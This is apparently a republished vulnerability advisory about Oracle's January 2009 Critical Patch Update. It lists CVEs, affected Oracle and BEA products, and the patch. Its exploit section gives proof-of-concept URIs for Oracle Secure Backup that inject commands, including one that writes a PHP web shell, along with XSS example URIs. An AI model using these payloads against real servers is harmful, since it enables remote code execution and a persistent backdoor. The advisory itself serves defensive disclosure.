Oracle January 2009 Critical Patch Update Multiple Vulnerabilities

BID:33177

Info

Oracle January 2009 Critical Patch Update Multiple Vulnerabilities

Bugtraq ID: 33177
Class: Unknown
CVE: CVE-2008-5463
CVE-2008-5462
CVE-2008-5461
CVE-2008-5460
CVE-2008-5459
CVE-2008-5458
CVE-2008-5457
CVE-2008-5456
CVE-2008-5455
CVE-2008-5454
CVE-2008-5452
CVE-2008-5451
CVE-2008-5450
CVE-2008-5449
CVE-2008-5448
CVE-2008-5447
CVE-2008-5446
CVE-2008-5445
CVE-2008-5444
CVE-2008-5443
CVE-2008-5442
CVE-2008-5441
CVE-2008-5440
CVE-2008-5439
CVE-2008-5438
CVE-2008-5437
CVE-2008-5436
CVE-2008-4017
CVE-2008-4016
CVE-2008-4015
CVE-2008-4014
CVE-2008-4007
CVE-2008-4006
CVE-2008-3999
CVE-2008-3997
CVE-2008-3981
CVE-2008-3979
CVE-2008-3978
CVE-2008-3974
CVE-2008-3973
CVE-2008-2623
Remote: Yes
Local: Yes
Published: Jan 08 2009 12:00AM
Updated: Sep 14 2009 05:31PM
Credit: Deniz Cevik of Intellect; Andy Davis of Information Risk Management Plc (IRM Plc); Esteban Martinez Fayo of Application Security, Inc.; Franz Huell of Red Database Security; Wasim Iqbal; Joxean Koret; Joxean Koret of TippingPoint (3com); Alexander Kornbrus
Vulnerable: Oracle TimesTen In-Memory Database 7.0.5.4.0
Oracle TimesTen In-Memory Database 7.0.5.3.0
Oracle TimesTen In-Memory Database 7.0.5.2.0
Oracle TimesTen In-Memory Database 7.0.5.1.0
Oracle Secure Backup 10.2.0.3
Oracle Secure Backup 10.2.0.2
Oracle Secure Backup 10.1.0.3
Oracle Secure Backup 10.1.0.2
Oracle Secure Backup 10.1.0.1
Oracle Oracle9i Standard Edition 9.2 .8DV
Oracle Oracle9i Standard Edition 9.2 .8
Oracle Oracle9i Personal Edition 9.2 .8DV
Oracle Oracle9i Personal Edition 9.2 .8
Oracle Oracle9i Enterprise Edition 9.2 .8DV
Oracle Oracle9i Enterprise Edition 9.2 .8.0
Oracle Oracle11g Standard Edition One 11.1 6
Oracle Oracle11g Standard Edition 11.1 6
Oracle Oracle11g Standard Edition 11.1 6
Oracle Oracle11g Enterprise Edition 11.1 6
Oracle Oracle10g Standard Edition 10.2 .3
Oracle Oracle10g Standard Edition 10.2 .2
Oracle Oracle10g Standard Edition 10.1 .5
Oracle Oracle10g Standard Edition 10.2.0.4
Oracle Oracle10g Personal Edition 10.2 .3
Oracle Oracle10g Personal Edition 10.2 .2
Oracle Oracle10g Personal Edition 10.1 .5
Oracle Oracle10g Personal Edition 10.2.0.4
Oracle Oracle10g Enterprise Edition 10.2 .3
Oracle Oracle10g Enterprise Edition 10.2 .2
Oracle Oracle10g Enterprise Edition 10.1 .5
Oracle Oracle10g Enterprise Edition 10.2.0.4
Oracle Oracle10g Enterprise Edition 10.2.0.2 64 bit
Oracle Oracle10g Application Server 10.1.3 .3.0
Oracle Oracle10g Application Server 10.1.2 .2.0
Oracle Oracle10g Application Server 10.1.2.3.0
Oracle Enterprise Manager Grid Control 10g 10.2.0.4
Oracle E-Business Suite 11i 11.5.10.2
Oracle E-Business Suite 12.0.6
Oracle Collaboration Suite Release 1 10.1.2
BEA Systems Weblogic Server 8.1 SP 6
BEA Systems Weblogic Server 8.1 SP 5
BEA Systems Weblogic Server 8.1 SP 4
BEA Systems Weblogic Server 8.1 SP 3
BEA Systems Weblogic Server 8.1 SP 2
BEA Systems Weblogic Server 8.1 SP 1
BEA Systems Weblogic Server 8.1
BEA Systems Weblogic Server 7.0 .0.1 SP 4
BEA Systems Weblogic Server 7.0 .0.1 SP 3
BEA Systems Weblogic Server 7.0 .0.1 SP 2
BEA Systems Weblogic Server 7.0 .0.1 SP 1
BEA Systems Weblogic Server 7.0 .0.1
BEA Systems Weblogic Server 7.0 SP 7
BEA Systems Weblogic Server 7.0 SP 6
BEA Systems Weblogic Server 7.0 SP 5
BEA Systems Weblogic Server 7.0 SP 4
BEA Systems Weblogic Server 7.0 SP 3
BEA Systems Weblogic Server 7.0 SP 2
BEA Systems Weblogic Server 7.0 SP 1
BEA Systems Weblogic Server 7.0
- HP HP-UX 11.0
- HP HP-UX 11i v1
- IBM AIX 4.3.3
- Microsoft Windows 2000 Advanced Server SP2
- Microsoft Windows 2000 Advanced Server SP1
- Microsoft Windows 2000 Advanced Server
- Microsoft Windows 2000 Datacenter Server SP2
- Microsoft Windows 2000 Datacenter Server SP1
- Microsoft Windows 2000 Datacenter Server
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
- Microsoft Windows 2000 Server SP2
- Microsoft Windows 2000 Server SP1
- Microsoft Windows 2000 Server
- Microsoft Windows NT Enterprise Server 4.0 SP6a
- Microsoft Windows NT Enterprise Server 4.0 SP6
- Microsoft Windows NT Enterprise Server 4.0 SP5
- Microsoft Windows NT Enterprise Server 4.0 SP4
- Microsoft Windows NT Server 4.0 SP6a
- Microsoft Windows NT Server 4.0 SP6
- Microsoft Windows NT Server 4.0 SP5
- Microsoft Windows NT Server 4.0 SP4
- Microsoft Windows NT Workstation 4.0 SP6a
- Microsoft Windows NT Workstation 4.0 SP6
- Microsoft Windows NT Workstation 4.0 SP5
- Microsoft Windows NT Workstation 4.0 SP4
- Redhat Linux 7.1 i386
- Redhat Linux 6.2 i386
- Sun Solaris 8_sparc
- Sun Solaris 2.7_sparc
- Sun Solaris 2.6_sparc
BEA Systems Weblogic Server 9.2 Maintenance Pack
BEA Systems Weblogic Server 9.2
BEA Systems Weblogic Server 9.1
BEA Systems Weblogic Server 9.1
BEA Systems Weblogic Server 9.0
BEA Systems Weblogic Server 8.1
BEA Systems Weblogic Server 7.0 SP7
BEA Systems Weblogic Server 10.3
BEA Systems Weblogic Server 10.3
BEA Systems Weblogic Server 10.0 MP1
BEA Systems Weblogic Server 10.0
BEA Systems Weblogic Server 10.0
BEA Systems WebLogic Portal 8.1 SP6
BEA Systems WebLogic Portal 8.1 SP5
BEA Systems WebLogic Portal 8.1 SP4
BEA Systems WebLogic Portal 8.1 SP3
BEA Systems WebLogic Portal 8.1 SP2
BEA Systems WebLogic Portal 8.1 SP1
BEA Systems WebLogic Portal 8.1
BEA Systems WebLogic Portal 9.2 MP3
BEA Systems WebLogic Portal 9.2
BEA Systems WebLogic Portal 10.3
BEA Systems WebLogic Portal 10.2
BEA Systems WebLogic Portal 10.0 MP1
BEA Systems WebLogic Portal 10.0
Not Vulnerable:

Discussion

Oracle January 2009 Critical Patch Update Multiple Vulnerabilities

Oracle has released the January 2009 critical patch update. The update addresses 41 vulnerabilities affecting the following software:

Oracle Database
Oracle Secure Backup
Oracle TimesTen In-Memory Database
Oracle Application Server
Oracle Collaboration Suite
Oracle E-Business Suite Release
Oracle Enterprise Manager Grid Control
PeopleSoft Enterprise HRMS
JD Edwards Tools
Oracle WebLogic Server (formerly BEA WebLogic Server)
Oracle WebLogic Portal (formerly BEA WebLogic Portal)

Exploit / POC

Oracle January 2009 Critical Patch Update Multiple Vulnerabilities

Some of these issues may not require specific exploit code and may be trivial to exploit.

Core Security Technologies has developed working commercial exploits for its CORE IMPACT product for the issues documented by CVE-2008-5449 and CVE-2008-5457. These exploits are not otherwise publicly available or known to be circulating in the wild.

The following proof-of-concept URIs are available for Oracle Secure Backup:

1. Create a file in the directory "c:\":

https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+hello+world+%3E+c:\oracle.secure.backup.txt+;

2. Create a PHP backdoor:

https://www.example.com/login.php?clear=no&ora_osb_lcookie=aa&ora_osb_bgcookie=bb&button=Logout&rbtool=cmd.exe+/c+echo+%22%3C%3Fphp+print(shell_exec(%24_GET%5B'a'%5D))%3B+%3F%3E%22+%3E+test.php%3B%26%26+echo

The following example URI is available for the Oracle Application Server portal:

http://www.example.com/sso/jsp/login.jsp?site2pstoretoken=XSS
PORTAL&search_type=XSS

The following example URI is available for Oracle Forms:

http://www.example.com/ifcgi60.exe?form=XSS

The following exploits and proof of concept are available:

Solution / Fix

Oracle January 2009 Critical Patch Update Multiple Vulnerabilities

Solution:
Oracle has released CPUJan2009 (Critical Patch Update January 2009) to address these issues. Contact the vendor for details on obtaining and applying the appropriate updates.

References

Oracle January 2009 Critical Patch Update Multiple Vulnerabilities

References:

© CVE.report 2026

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report